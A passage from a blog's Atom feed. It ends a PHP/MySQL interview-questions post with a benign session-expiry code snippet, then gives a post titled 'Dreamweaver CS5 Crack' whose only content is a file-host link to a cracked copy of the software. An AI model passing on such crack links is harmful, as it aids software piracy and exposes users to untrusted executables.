0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; date &lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;});&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/pre&gt;
&lt;pre class="default prettyprint" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 10px; max-height: 600px; overflow-x: auto; overflow-y: auto; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px; text-align: left; vertical-align: baseline; width: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 21px;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: Arial, Helvetica, sans-serif; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;and for session&amp;gt;&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/pre&gt;
&lt;pre class="default prettyprint" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 10px; max-height: 600px; overflow-x: auto; overflow-y: auto; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px; text-align: left; vertical-align: baseline; width: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 21px;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: Arial, Helvetica, sans-serif; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;pre class="lang-php prettyprint" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 10px; max-height: 600px; overflow-x: auto; overflow-y: auto; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px; vertical-align: baseline; width: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="kwd" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;if&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;(&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;isSet&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;(&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;$_SESSION&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;[&lt;/span&gt;&lt;span class="str" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;'started'&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;])){&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;
&amp;nbsp; &lt;/span&gt;&lt;span class="kwd" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;if&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;((&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;mktime&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;()&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;-&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; $_SESSION&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;[&lt;/span&gt;&lt;span class="str" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;'started'&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;]&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;-&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span class="lit" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;60&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;*&lt;/span&gt;&lt;span class="lit" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;30&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;)&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&amp;gt;&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span class="lit" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;0&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;){&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;
&amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="com" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;//logout, destroy session etc&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;
&amp;nbsp; &lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;}&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;
&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;}&lt;/span&gt;&lt;span class="kwd" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;else&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;{&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;
&amp;nbsp; $_SESSION&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;[&lt;/span&gt;&lt;span class="str" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;'started'&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;]&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;=&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; mktime&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;();&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;
&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/pre&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-4786775104161191593?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/FiYkjYXpHCAn7ZoDXlgNpZ7owg0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/FiYkjYXpHCAn7ZoDXlgNpZ7owg0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/FiYkjYXpHCAn7ZoDXlgNpZ7owg0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/FiYkjYXpHCAn7ZoDXlgNpZ7owg0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/OZv1PtJsNp8" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/4786775104161191593/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2011/12/most-common-php-mysql-interview.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/4786775104161191593?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/4786775104161191593?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/OZv1PtJsNp8/most-common-php-mysql-interview.html" title="Most Common php + mysql interview questions" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-5bSEdidvAXU/TuZa1zI9BgI/AAAAAAAABkw/Dwnpg7pJLo4/s72-c/malaysia-php-mysql.gif" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2011/12/most-common-php-mysql-interview.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkQAQ3c6eCp7ImA9WhdXFkQ.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-6010754805660697878</id><published>2011-08-30T02:40:00.000-07:00</published><updated>2011-08-30T02:59:02.910-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-08-30T02:59:02.910-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="software" /><category scheme="http://www.blogger.com/atom/ns#" term="Dreamweaver" /><category scheme="http://www.blogger.com/atom/ns#" term="Crack" /><title>Dreamweaver CS5 Crack</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-ZhDJeCvZmpo/Tlyss-LxszI/AAAAAAAABdk/yPBbIok2nUA/s1600/dream.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-ZhDJeCvZmpo/Tlyss-LxszI/AAAAAAAABdk/yPBbIok2nUA/s320/dream.jpg" width="238" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #000033; font-family: Geneva,Arial,Helvetica,sans-serif; font-size: xx-small;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;To download copy this link in new tab :-&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
http://www.4shared.com/file/BnMv3YGI/Dreamweaver_CS5_Crack_NDR_Grou.html&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-6010754805660697878?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/L5dPBCsIp0JaPa6w6-SVVzdRAvU/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/L5dPBCsIp0JaPa6w6-SVVzdRAvU/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
